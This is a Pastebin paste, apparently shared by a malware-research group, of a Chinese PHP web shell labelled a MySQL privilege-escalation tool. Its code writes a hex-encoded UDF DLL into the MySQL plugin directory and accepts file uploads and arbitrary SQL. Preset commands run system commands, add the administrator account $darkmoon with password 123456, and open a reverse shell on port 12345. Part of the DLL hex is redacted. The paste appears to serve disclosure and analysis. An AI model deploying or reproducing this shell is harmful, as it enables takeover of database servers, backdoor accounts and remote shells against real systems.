API tools faq
paste
Advertisement
MalwareMustDie

UDF_PHP PHP/MySQL basis DLL Injection Web Shell

MalwareMustDie
Jan 4th, 2016
7,371
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 11.72 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. if (get_magic_quotes_gpc()) {
  3. function stripslashes_deep($value)
  4. {
  5. $value = is_array($value) ?
  6. array_map('stripslashes_deep', $value) :
  7. stripslashes($value);
  8.  
  9. return $value;
  10. }
  11.  
  12. $_POST = array_map('stripslashes_deep', $_POST);
  13. $_GET = array_map('stripslashes_deep', $_GET);
  14. $_COOKIE = array_map('stripslashes_deep', $_COOKIE);
  15. $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
  16. }
  17.  
  18. session_start();
  19. if($_GET['action']=='logout'){
  20. foreach($_COOKIE["connect"] as $key=>$value){
  21. setcookie("connect[$key]","",time()-1);
  22. }
  23. header("Location:".$_SERVER["SCRIPT_NAME"]);
  24. }
  25. if(!empty($_POST['submit'])){
  26. setcookie("connect");
  27. setcookie("connect[host]",$_POST['host']);
  28. setcookie("connect[name]",$_POST['name']);
  29. setcookie("connect[pass]",$_POST['pass']);
  30. setcookie("connect[dbname]",$_POST['dbname']);
  31. echo "<!script>location.href='?action=connect'</script>";
  32. }
  33.  
  34. /*
  35. foreach($_COOKIE["connect"] as $key=>$value){
  36. echo $key.":".$value."<br>";
  37. }
  38. */
  39.  
  40. if(empty($_GET["action"])){
  41. ?>
  42. <form name="form1" method="post" action="?action=connect">
  43.   <div align="center">
  44.     <table width="294" height="140" border="1" cellpadding="1" cellspacing="5">
  45.         <caption>
  46.                     <h5>基友菊花爆必备神器->MYSQL高版本提权工具</h5>
  47.         </caption>
  48.       <tr>
  49.         <td width="66">host:</td>
  50.         <td width="270"><input name="host" type="text" id="host" size="34"></td>
  51.       </tr>
  52.       <tr>
  53.         <td>name:</td>
  54.         <td><input name="name" type="text" id="name" size="34"></td>
  55.       </tr>
  56.       <tr>
  57.         <td>pass:</td>
  58.         <td><input name="pass" type="text" id="pass" size="34"></td>
  59.       </tr>
  60.       <tr>
  61.         <td>dbname:</td>
  62.         <td><input name="dbname" type="text" id="dbname" size="34"></td>
  63.       </tr>
  64.       <tr>
  65.         <td colspan="2"><div align="center">
  66.           <input type="submit" name="submit" value="提交">
  67.           &nbsp;
  68.           <input type="reset" name="Submit" value="重置">
  69.         </div></td>
  70.       </tr>
  71.     </table>
  72.   </div>
  73. </form>
  74. <div align="center"><strong>Copyright By Dark'mOon 2011</strong><br>
  75. Blog:<a href="http://www.moonhack.org" target="_blank">www.moonhack.org</a> Bbs:<a href="http://www.90sec.org" target="_blank">www.90sec.org</a>
  76. <a href="http://www.moonhack.org" target="_blank">版本更新 (version update)</a>
  77. </div>
  78.  
  79.   <?php
  80. exit;
  81. }
  82.  
  83. $link=@mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["name"],$_COOKIE["connect"]["pass"]);
  84. if(!$link){
  85. echo "连接失败.".mysql_error()."<!a href='javascr ipt:history.back()'>返回重填 (previous history)</a></script>";
  86. exit;
  87. }else{
  88. echo "连接成功 (connection success)<br>";
  89. $str=mysql_get_server_info();
  90. echo 'MYSQL版本 ( MySqlversion):'.$str."<br>";
  91. echo "<hr>";
  92. if($str[2]>=1){
  93. $sql="SHOW VARIABLES LIKE '%plugin_dir%'";
  94. $row=mysql_query($sql);
  95. $rows=mysql_fetch_row($row);
  96. $pa=str_replace('\\','/',$rows[1]);
  97. $path=$_SESSION['path']=$pa."/moonudf.dll";
  98.  
  99. }else{
  100. $path=$_SESSION['path']='C:/WINDOWS/moonudf.dll';
  101. }}
  102.  
  103. $conn=mysql_select_db($_COOKIE["connect"]["dbname"],$link);
  104. if(!$conn){
  105. echo "数据不存在.".mysql_error()."<!a href='javas cript:history.back()'>返回重填</a></script>";
  106. exit;
  107. }else{
  108. echo "数据库--".$_COOKIE['connect']['dbname']."--存在<br>";
  109. }
  110. echo '<a href="?action=logout">点击退出 (mmd: click to exit)</a>';
  111.  
  112. echo '<form action="" method="post" enctype="multipart/form-data" name="form1">';
  113. echo  '<table width="297" height="53" border="1">';
  114. echo    '<tr>';
  115. echo      '<td colspan="2">当前路径 (mmd: curret path):';      
  116. echo      "<input name='p' type='text' size='27' value='".dirname(__FILE__)."\'></td>";
  117. echo    '</tr>';
  118. echo    '<tr>';
  119. echo     '<td width="235"><input type="file" name="file"></td>';
  120. echo      '<td width="46"><input type="submit" name="subfile" value="上传文件(upload file)"></td>';
  121. echo    '</tr>';
  122. echo  '</table>';
  123. echo'</form>';
  124. if($_POST['subfile']){
  125. $upfile=$_POST['p'].$_FILES['file']['name'];
  126.  
  127. if(is_uploaded_file($_FILES['file']['tmp_name']))
  128.             {
  129. if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){
  130. echo '上传失败(upload failed)';
  131. }else{
  132. echo '上传成功(upload success),路径为(path)'.$upfile;
  133. }}}
  134.  
  135. echo '<hr>';
  136. echo '<form action="?action=dll" method="post"/>';
  137. echo '<table cellpadding="1" cellspacing="2">';
  138. echo '<tr><td>路径目录为 (mmd: dir/path)</td></tr>';
  139. echo "<tr><td><input type='text' name='dll' size='40' value='$path'/></td>";
  140. echo '<td><input type="submit" name="subudf" value="导出udf"/></td></tr>';
  141. echo '</table>';
  142. echo '</form>';
  143. echo '<hr>';
  144. if($_POST['subudf']){
  145. mysql_query('DROP TABLE Temp_udf');
  146. $query=mysql_query('CREATE TABLE Temp_udf(udf BLOB);');
  147. if(!$query){
  148. echo '创建临时表Temp_udf失败请查看失败内容 (Temp_udf failed to create a temporary table, please see the failure msg)'.mysql_error();
  149. }else{
  150. $shellcode=udfcode();
  151. $query="INSERT into Temp_udf values (CONVERT($shellcode,CHAR));";
  152. if(!mysql_query($query)){
  153. echo 'udf插入失败请查看失败内容(udf insertion failed, see error message)'.mysql_error();
  154. }else{
  155. $query="SELECT udf FROM Temp_udf INTO DUMPFILE '".$path."';" ;
  156. if(!mysql_query($query)){
  157. echo 'udf导出失败请查看失败内容(udf export failed. see error message)'.mysql_error();
  158. }else{
  159. mysql_query('DROP TABLE Temp_udf');
  160. echo '导出成功(export success)';
  161. }
  162. }
  163. }
  164. }
  165.  
  166. echo '<form name="form2" method="post" action="">';
  167. echo  '<table width="300" height="59" border="1.2" cellpadding="0" cellspacing="1">';
  168. echo    '<tr>';
  169. echo      '<td width="83">文件路径: (file path)</td>';
  170. echo      '<td width="201"><input name="diy" type="text" id="diy" size="27"></td>';
  171. echo    '</tr>';
  172. echo    '<tr>';
  173. echo      '<td>目标路径: (target path)</td>';
  174. echo      '<td><input name="diypath" type="text" id="diypath" size="27" value="C:/WINDOWS/diy.dll"></td>';
  175. echo    '</tr>';
  176. echo    '<tr>';
  177. echo      '<td colspan="2">';
  178.        
  179. echo        '<div align="right">';
  180. echo          '<input type="submit" name="Submit2" value="Custom Export">';
  181. echo      '</div></td></tr>';
  182. echo '</table>';
  183. echo '</form>';
  184.  
  185. if(!empty($_POST['diy'])){
  186. $diy=str_replace('\\','/',$_POST['diy']);
  187. $diypath=str_replace('\\','/',$_POST['diypath']);
  188. mysql_query('DROP TABLE diy_dll');
  189. $s='create table diy_dll (cmd LONGBLOB)';
  190. if(!mysql_query($s)){
  191. echo '创建diy_dll表失败 (diy_dll creation fails)'.mysql_error();
  192. }else{
  193. $s="insert into diy_dll (cmd) values (hex(load_file('$diy')))";
  194. if(!mysql_query($s)){
  195. echo "插入自定义文件失败 (custom file injection failed)".mysql_error();
  196. }else{
  197. $s="SELECT unhex(cmd) FROM diy_dll INTO DUMPFILE '$diypath'";
  198. if(!mysql_query($s)){
  199. echo "导出自定义dll出错 (Export Custom DLL error)".mysql_error();
  200. }else{
  201. mysql_query('DROP TABLE diy_dll');
  202. echo "成功导出自定义dll (Export Custom DLL Success)<br>";
  203. }}}}
  204.  
  205. echo "<hr>";
  206. echo '自带命令 (shell command):<br>';
  207. echo '<form action="" method="post">';
  208. echo '<select name="mysql">';
  209. echo '<option value="create function cmdshell returns string soname \'moonudf.dll\'">创建cmdshell</option>';
  210. echo '<option value="select cmdshell(\'net user $darkmoon 123456 /add & net localgroup administrators $darkmoon /add\')">添加超级管理员</option>';
  211. echo '<option value="select cmdshell(\'net user\')">查看用户 (View user))</option>';
  212. echo '<option value="select cmdshell(\'netstat -an\')">查看端口 (View Port)</option>';
  213. echo '<option value="select name from mysql.func">查看创建函数 (See created function)</option>';
  214. echo '<option value="delete from mysql.func where name=\'cmdshell\'">删除cmdshell</option>';
  215. echo '<option value="create function backshell returns string soname \'moonudf.dll\'">创建反弹函数 (Create backconnect)</option>';
  216. echo '<option value="select backshell(\''.$_SERVER["REMOTE_ADDR"].'\',12345)">执行反弹(Backconnect exec..)</option>';
  217. echo '<option value="delete from mysql.func where name=\'backshell\'">删除backshell</option>';
  218. echo '</select>';
  219. echo '<input type="submit" value="提交(Submit)" />';
  220. echo '</form>';
  221.  
  222. echo '<form action="?action=sql" method="post">';
  223. echo '自定义SQL语句 (Custom SQL cmd):<br>';
  224. echo '<textarea name="mysql" cols="40" rows="6"></textarea>';
  225. echo '<input type="submit" value="执行" />';
  226. echo '</form>';
  227.  
  228. echo "回显结果 (Echo Results):<br>";
  229. echo '<textarea cols="50" rows="10" id="contactus" name="contactus">';
  230. if(!empty($_POST['mysql'])){
  231. echo "SQL语句:".$sql=$_POST['mysql']."\r\n";
  232. $sql=mysql_query($sql) or die(mysql_error());
  233. while($rows=@mysql_fetch_row($sql)){
  234. foreach($rows as $value){
  235. echo $value;
  236. }}}
  237.  
  238. echo '</textarea><br>';
  239. echo '<hr>';
  240. print("
  241. 功能说明 (Functionality Description):<br>
  242. MYSQL=>5.1<br>
  243. 自动获取高版本mysql调用函数路径(测试mysql5.5)(Mysql recent version autocalls paths/tested in v5.5)<br>
  244. MYSQL<=5.0默认为系统目录(defaults to system directory)<br>
  245. 自定义导出dll (Customize DLL export) <br>
  246. 默认udf自带函数(Udf comes with default function)<br>
  247. cmdshell 执行cmd;<br>
  248. downloader 下载者,到网上下载指定文件并保存到指定目录;<br>
  249. open3389 通用开3389终端服务,可指定端口(不改端口无需重启);<br>
  250. backshell 反弹Shell;<br>
  251. ProcessView 枚举系统进程;<br>
  252. KillProcess 终止指定进程;<br>
  253. regread 读注册表;<br>
  254. regwrite 写注册表;<br>
  255. shut 关机,注销,重启;<br>
  256. about 说明与帮助函数;<br>
  257. 默认添加管理员账号$darkmoon 密码123456 (Add $darkmoon as default admin acct, pwd:123456)<br>
  258. 默认反弹端口12345(default backconnect port 12345)<br>
  259. 不要随便删除刚创建的函数 重新生效要mysql重启(Do not delete the newly created function revalidation to restart mysql)<br>
  260. 别人的udf 请自行看别人的udf说明(Others udf pls see others' description)<br>
  261. 常用命令(common commands)<br>
  262. create function cmdshell returns string soname 'moonudf.dll'<br>
  263. select cmdshell('命令')<br>
  264. select backshell('你的ip',12345)<br>
  265. nc -l -p 12345
  266. ");
  267. function udfcode(){return "0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c001009000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e557061636b000000b00100001000000000000000000000000000000000000000000000600000e02e727372630000000050010000c00100e6da000000020000000000000000000000000000600000e088010010e89a02101b0000000e000000001000106b970210b7970210ba970210c8970210a3970210fc0f0010de960210e0960210809502101dba0110ed970210ffaf0110d2960210000400007c070000c40b0000b30200006604000090c0011000000000ffffffff0100000001000000010000000100000000000000000000000000000001000
  268. /////////////////////////   REDACTED FOR THE SECURITY PURPOSE //////////////////////////////////////
  269. 5696e69740050726f63657373566965775f696e69740061626f75740061626f75745f6465696e69740061626f75745f696e6974006261636b7368656c6c006261636b7368656c6c5f6465696e6974006261636b7368656c6c5f696e697400636d647368656c6c00636d647368656c6c5f6465696e697400636d647368656c6c5f696e697400646f776e6c6f6164657200646f776e6c6f616465725f6465696e697400646f776e6c6f616465725f696e6974006f70656e33333839006f70656e333338395f6465696e6974006f70656e333338395f696e6974007265677265616400726567726561645f6465696e697400726567726561645f696e69740072656777726974650072656777726974655f6465696e69740072656777726974655f696e6974007368757400736875745f6465696e697400736875745f696e697400";
  270. }
  271. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!